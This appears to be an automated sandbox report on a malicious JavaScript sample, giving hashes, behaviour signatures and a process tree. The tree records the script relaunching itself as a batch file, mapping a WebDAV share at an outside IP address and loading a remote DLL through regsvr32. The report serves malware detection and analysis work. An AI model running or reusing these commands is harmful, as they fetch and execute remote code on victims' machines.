Analysis
- max time kernel: 122s
- max time network: 125s
- platform: windows7_x64
- resource: win7-20240704-en
- resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
- submitted: 09/07/2024, 06:17
Static task: static1
Behavioral task: behavioral1
- Sample: 4860312552222814311.js
- Resource: win7-20240704-en
Behavioral task: behavioral2
- Sample: 4860312552222814311.js
- Resource: win10v2004-20240704-en
General
- Target: 4860312552222814311.js
- Size: 5KB
- MD5: 08d79ad15bc6fc6848a70f25a28eb7a0
- SHA1: fa447ac9b1f8400c0d7fbaba97e5a79405c9426f
- SHA256: 0b83da13ccf53341792db8deec36c9af70154a0caaab8062d64a3fa8c22b9fb6
- SHA512: 8fdf7a8f536d765ce994e6df07b93a9b073c3bdf903e20588608d6a3114286fa185937db9da55b6d1d894ff0f7140549e9443b2c697153fc67bc70ffc9e76066
- SSDEEP: 96:xomU+mw9fwvcm0dy3wLxdy330pd53QpDvhnLekyzLpd++LekuLZHo2p/rk12p/e:RowCMdy34xdy33QSpdqkypd0kezrkKe
Malware Config
Signatures
- Command and Scripting Interpreter: JavaScript (1 TTPs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Runs net.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)

  | pid | Process |
  | 2768 | regsvr32.exe |

- Suspicious use of WriteProcessMemory (11 IoCs)

  | description | pid | Process | procid_target |
  | PID 2560 wrote to memory of 2964 | 2560 | wscript.exe | 30 |
  | PID 2560 wrote to memory of 2964 | 2560 | wscript.exe | 30 |
  | PID 2560 wrote to memory of 2964 | 2560 | wscript.exe | 30 |
  | PID 2964 wrote to memory of 2708 | 2964 | cmd.exe | 32 |
  | PID 2964 wrote to memory of 2708 | 2964 | cmd.exe | 32 |
  | PID 2964 wrote to memory of 2708 | 2964 | cmd.exe | 32 |
  | PID 2964 wrote to memory of 2768 | 2964 | cmd.exe | 33 |
  | PID 2964 wrote to memory of 2768 | 2964 | cmd.exe | 33 |
  | PID 2964 wrote to memory of 2768 | 2964 | cmd.exe | 33 |
  | PID 2964 wrote to memory of 2768 | 2964 | cmd.exe | 33 |
  | PID 2964 wrote to memory of 2768 | 2964 | cmd.exe | 33 |
Processes
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\4860312552222814311.js
  Suspicious use of WriteProcessMemory
  PID: 2560
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\4860312552222814311.js" "C:\Users\Admin\\ovwexs.bat" && "C:\Users\Admin\\ovwexs.bat"
    Suspicious use of WriteProcessMemory
    PID: 2964
    - C:\Windows\system32\net.exe
      net use \\45.9.74.13@8888\DavWWWRoot\
      PID: 2708
    - C:\Windows\system32\regsvr32.exe
      regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\68.dll
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID: 2768
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 5KB
  MD5: 08d79ad15bc6fc6848a70f25a28eb7a0
  SHA1: fa447ac9b1f8400c0d7fbaba97e5a79405c9426f
  SHA256: 0b83da13ccf53341792db8deec36c9af70154a0caaab8062d64a3fa8c22b9fb6
  SHA512: 8fdf7a8f536d765ce994e6df07b93a9b073c3bdf903e20588608d6a3114286fa185937db9da55b6d1d894ff0f7140549e9443b2c697153fc67bc70ffc9e76066